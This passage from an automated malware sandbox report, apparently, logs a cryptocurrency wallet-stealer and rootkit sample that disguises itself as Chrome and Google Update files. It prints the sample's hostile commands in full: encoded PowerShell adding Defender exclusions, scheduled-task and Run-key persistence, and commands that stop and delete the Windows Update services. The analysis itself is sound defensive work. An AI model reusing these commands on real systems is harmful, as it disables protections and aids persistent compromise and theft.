'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\brave.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\brave.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\ofg.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Create /TR "C:\Users\user\AppData\Local\Google\ofg.exe" /TN "MicrosoftEdge{e60e5877-76e2-4b84-98a8-90161a4b47ca}" /SC ONLOGON /F /RL HIGHEST	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -enC QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAnAEMAOgBcAFUAcwBlAHIAcwBcAFIAZQB2AGUAbABpAG4AJwAsACAAJwBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzACcAKQAgAC0ARgBvAHIAYwBlAA==	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -enC UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AUwB1AGIAbQBpAHQAUwBhAG0AcABsAGUAcwBDAG8AbgBzAGUAbgB0ACAAMgA=	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Create /TR "C:\Users\user\AppData\Local\Google\chrome.exe" /TN "GoogleUpdateTask{56c41dbe-92cb-4ab7-b423-bd40cb65f9fe}" /SC ONLOGON /F /RL HIGHEST	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Create /TR "C:\Users\user\AppData\Local\Google\chrome.exe" /TN "GoogleUpdateTaskUAC{0625ad4f-50a5-4d12-b200-288d853de0d5}" /SC HOURLY /F /MO 1 /RL HIGHEST	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Process created: C:\Windows\GoogleUpdate.exe C:\Windows\GoogleUpdate.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Process created: C:\Windows\GoogleUpdate.exe C:\Windows\GoogleUpdate.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Process created: C:\Windows\GoogleUpdate.exe C:\Windows\GoogleUpdate.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\ofg.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Create /TR "C:\Users\user\AppData\Local\Google\ofg.exe" /TN "MicrosoftEdge{e60e5877-76e2-4b84-98a8-90161a4b47ca}" /SC ONLOGON /F /RL HIGHEST	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop dosvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -enC QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAnAEMAOgBcAFUAcwBlAHIAcwBcAFIAZQB2AGUAbABpAG4AJwAsACAAJwBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzACcAKQAgAC0ARgBvAHIAYwBlAA==
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Process created: unknown unknown
Source: C:\Windows\GoogleUpdate.exe	Process created: unknown unknown
Source: C:\Windows\GoogleUpdate.exe	Process created: unknown unknown
Source: C:\Windows\GoogleUpdate.exe	Process created: unknown unknown

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

File created: C:\Users\user\AppData\Local\Temp\launcher.exe

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Source: 0.3.6iWK0k820U.exe.520000.0.unpack, BrEx.cs

Base64 encoded string: 'ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8WW9yb2lXYWxsZXQKaWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8VHJvbmxpbmsKamJkYW9jbmVpaWlubWpiamxnYWxoY2VsZ2Jlam1uaWR8TmlmdHlXYWxsZXQKbmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58TWV0YW1hc2sKYWZiY2JqcGJwZmFkbGttaG1jbGhrZWVvZG1hbWNmbGN8TWF0aFdhbGxldApobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHxDb2luYmFzZQpmaGJvaGltYWVsYm9ocGpiYmxkY25nY25hcG5kb2RqcHxCaW5hbmNlQ2hhaW4Kb2RiZnBlZWloZGtiaWhtb3BrYmptb29uZmFubGJmY2x8QnJhdmVXYWxsZXQKaHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58R3VhcmRhV2FsbGV0CmJsbmllaWlmZmJvaWxsa25qbmVwb2dqaGtnbm9hcGFjfEVxdWFsV2FsbGV0CmNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfEpheHh4TGliZXJ0eQpmaWhrYWtmb2JrbWtqb2pwY2hwZmdjbWhmam5tbmZwaXxCaXRBcHBXYWxsZXQKa25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8aVdhbGxldAphbWttamptbWZsZGRvZ21ocGpsb2ltaXBib2ZuZmppaHxXb21iYXQKZmhpbGFoZWltZ2xpZ25kZGtqZ29ma2NiZ2VraGVuYmh8QXRvbWljV2FsbGV0Cm5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfE1ld0N4Cm5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfEd1aWxkV2FsbGV0Cm5rZGRnbmNkamdqZmNkZGFtZmdjbWZubGhjY25pbWlnfFNhdHVybldhbGxldApmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3xSb25pbldhbGxldAphaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHxUZXJyYVN0YXRpb24KZm5uZWdwaGxvYmpkcGtoZWNhcGtpampka2djamhraWJ8SGFybW9ueVdhbGxldAphZWFjaGtubWVmcGhlcGNjaW9uYm9vaGNrb25vZWVtZ3xDb2luOThXYWxsZXQKY2dlZW9kcGZhZ2pjZWVmaWVmbG1kZnBocGxrZW5sZmt8VG9uQ3J5c3RhbApwZGFkamtma2djYWZnYmNlaW1jcGJrYWxuZm5lcGJua3xLYXJkaWFDaGFpbgpiZm5hZWxtb21laW1obHBtZ2puam9waGhwa2tvbGpwYXxQaGFudG9tCmZoaWxhaGVpbWdsaWduZGRramdvZmtjYmdla2hlbmJofE94eWdlbgptZ2Zma2ZiaWRpaGpwb2FvbWFqbGJnY2hkZGxpY2dwbnxQYWxpV2FsbGV0CmFvZGtrYWduYWRjYm9iZnBnZ2ZuamVvbmdlbWpiamNhfEJvbHRYCmtwZm9wa2VsbWFwY29pcGVtZmVuZG1kY2dobmVnaW1ufExpcXVhbGl0eVdhbGxldApobWVvYm5mbmZjbWRrZGNtbGJsZ2FnbWZwZmJvaWVhZnxYZGVmaVdhbGxldApscGZjYmprbmlqcGVlaWxsaWZua2lrZ25jaWtnZmhkb3xOYW1pV2FsbGV0CmRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfE1haWFyRGVGaVdhbGxldApmZm5iZWxmZG9laW9oZW5ramlibm1hZGppZWhqaGFqYnxZb3JvaVdhbGxldAppYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb2lob2ZlY3xUcm9ubGluawpqYmRhb2NuZWlpaW5tamJqbGdhbGhjZWxnYmVqbW5pZHxOaWZ0eVdhbGxldApua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnxNZXRhbWFzawphZmJjYmpwYnBmYWRsa21obWNsaGtlZW9kbWFtY2ZsY3xNYXRoV2FsbGV0CmhuZmFua25vY2Zlb2ZiZGRnY2lqbm1obmZua2RuYWFkfENvaW5iYXNlCmZoYm9oaW1hZWxib2hwamJibGRjbmdjbmFwbmRvZGpwfEJpbmFuY2VDaGFpbgpvZGJmcGVlaWhka2JpaG1vcGtiam1vb25mYW5sYmZjbHxCcmF2ZVdhbGxldApocGdsZmhnZm5oYmdwamRlbmpnbWRnb2VpYXBwYWZsbnxHdWFyZGFXYWxsZXQKYmxuaWVpaWZmYm9pbGxrbmpuZXBvZ2poa2dub2FwYWN8RXF1YWxXYWxsZXQKY2plbGZwbHBsZWJkamplbmxscGpjYmxtamtmY2ZmbmV8SmF4eHhMaWJlcnR5CmZpaGtha2ZvYmtta2pvanBjaHBmZ2NtaGZqbm1uZnBpfEJpdEFwcFdhbGxldAprbmNjaGRpZ29iZ2hlbmJiYWRkb2pqbm5hb2dmcHBmanxpV2FsbGV0CmFta21qam1tZmxkZG9nbWhwamxvaW1pcGJvZm5mamlofFdvbWJhdApmaGlsYWhlaW1nbGlnbmRka2pnb2ZrY2JnZWtoZW5iaHxBdG9taWNXYWxsZXQKbmxibW5uaWpjbmxlZ2tqanBjZmpjbG1jZmdnZmVmZG18TWV3Q3gKbmFuam1ka25oa2luaWZua2dkY2dnY2ZuaGRhYW1tbWp8R3VpbGRXYWxsZXQKbmtkZGduY2RqZ2pmY2RkYW1mZ2NtZm5saGNjbmltaWd8U2F0dXJuV2FsbGV0CmZuamhta2hobWtiamtrYWJuZGNubm9nYWdvZ2JuZWVjfFJvbmluV2FsbGV

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6020:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3732:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4956:120:WilError_01
Source: C:\Users\user\AppData\Local\Google\brave.exe	Mutant created: \Sessions\1\BaseNamedObjects\NiBhAaAa__shmem3_winpthreads_tdm_
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1332:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4780:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5620:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2620:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1172:120:WilError_01
Source: C:\Windows\GoogleUpdate.exe	Mutant created: \Sessions\1\BaseNamedObjects\GoogleUpdate{825b2ad2-5778-421f-86b5-fbf0592aa463}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1112:120:WilError_01
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5796
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5788:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4296:120:WilError_01

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\GoogleUpdate.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\GoogleUpdate.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: GoogleUpdate_unsigned.pdb source: GoogleUpdate.exe, 0000002A.00000000.383401879.00000000001B1000.00000020.00000001.01000000.0000000C.sdmp, GoogleUpdate.exe, 00000032.00000000.395920744.00000000001B1000.00000020.00000001.01000000.0000000C.sdmp, GoogleUpdate.exe, 00000035.00000000.407003617.00000000001B1000.00000020.00000001.01000000.0000000C.sdmp
Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master_1.3.0\r77-rootkit-master\vs\Release\r77-x86.pdb source: ofg.exe, 00000011.00000002.540297511.0000000000EB0000.00000040.00001000.00020000.00000000.sdmp, ofg.exe, 00000015.00000002.540965896.0000000001350000.00000040.00000400.00020000.00000000.sdmp, ofg.exe, 00000015.00000002.541382921.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.533068784.0000000002F60000.00000040.00000400.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.533175421.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, GoogleUpdate.exe, 00000035.00000002.588275615.0000000000D40000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master_1.3.0\r77-rootkit-master\vs\InstallStager\obj\Release\InstallStager.pdb source: brave.exe, 0000000E.00000002.458992408.0000017A76E82000.00000004.00000020.00020000.00000000.sdmp, 85AD.tmp.14.dr
Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master_1.3.0\r77-rootkit-master\vs\InstallStager\obj\Release\InstallStager.pdb- source: brave.exe, 0000000E.00000002.458992408.0000017A76E82000.00000004.00000020.00020000.00000000.sdmp, 85AD.tmp.14.dr
Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master_1.3.0\r77-rootkit-master\vs\x64\Release\Install.pdb source: brave.exe, 0000000E.00000002.458992408.0000017A76E82000.00000004.00000020.00020000.00000000.sdmp, 85AD.tmp.14.dr

Data Obfuscation

Detected unpacking (overwrites its own PE header)

Source: C:\Windows\GoogleUpdate.exe

Unpacked PE file: 53.2.GoogleUpdate.exe.1b0000.0.unpack

Detected unpacking (changes PE section rights)

Source: C:\Windows\GoogleUpdate.exe

Unpacked PE file: 53.2.GoogleUpdate.exe.1b0000.0.unpack .text:ER;.data:W;.idata:R;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;

Source: C:\Users\user\Desktop\6iWK0k820U.exe	Code function: 0_2_0040EB11 push ecx; ret	0_2_0040EB24
Source: C:\Users\user\Desktop\6iWK0k820U.exe	Code function: 0_2_0042231C push es; iretd	0_2_00422332
Source: C:\Users\user\Desktop\6iWK0k820U.exe	Code function: 0_2_0040AFD2 push ecx; ret	0_2_0040AFE5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 2_2_0687C850 pushad ; ret	2_2_0687C865
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 14_2_00007FF6A62C2598 push rbx; retf	14_2_00007FF6A62C259A

Source: C:\Users\user\Desktop\6iWK0k820U.exe

Code function: 0_2_004117EC LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,

0_2_004117EC

Source: brave.exe.2.dr	Static PE information: section name: .xdata
Source: updater.exe.14.dr	Static PE information: section name: .xdata
Source: 85AD.tmp.14.dr	Static PE information: section name: _RDATA

Source: 85AD.tmp.14.dr	Static PE information: real checksum: 0x0 should be: 0x5841e
Source: updater.exe.14.dr	Static PE information: real checksum: 0x2ce193 should be: 0x2c34ef
Source: brave.exe.2.dr	Static PE information: real checksum: 0x2ce193 should be: 0x2c34ee
Source: ofg.exe.2.dr	Static PE information: real checksum: 0x0 should be: 0x1938e

Persistence and Installation Behavior

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Users\user\AppData\Local\Google\chrome.exe

Executable created and started: C:\Windows\GoogleUpdate.exe

Jump to behavior

Source: C:\Users\user\AppData\Local\Google\brave.exe	File created: C:\Program Files\Google\Chrome\updater.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File created: C:\Users\user\AppData\Local\Google\brave.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File created: C:\Users\user\AppData\Local\Google\chrome.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File created: C:\Users\user\AppData\Local\Google\ofg.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Google\brave.exe	File created: C:\Users\user\AppData\Local\Temp\85AD.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Google\chrome.exe	File created: C:\Windows\GoogleUpdate.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Google\chrome.exe

File created: C:\Windows\GoogleUpdate.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Local\Google\ofg.exe

Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Create /TR "C:\Users\user\AppData\Local\Google\ofg.exe" /TN "MicrosoftEdge{e60e5877-76e2-4b84-98a8-90161a4b47ca}" /SC ONLOGON /F /RL HIGHEST

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\sc.exe sc stop UsoSvc

Hooking and other Techniques for Hiding and Protection

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Source: C:\Windows\GoogleUpdate.exe	Memory written: PID: 1952 base: D30005 value: E9 FB 99 BB 76
Source: C:\Windows\GoogleUpdate.exe	Memory written: PID: 1952 base: 778E9A00 value: E9 0A 66 44 89

Found hidden mapped module (file has been removed from disk)

Source: C:\Users\user\AppData\Local\Google\brave.exe

Module Loaded: C:\PROGRAM FILES\GOOGLE\CHROME\UPDATER.EXE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
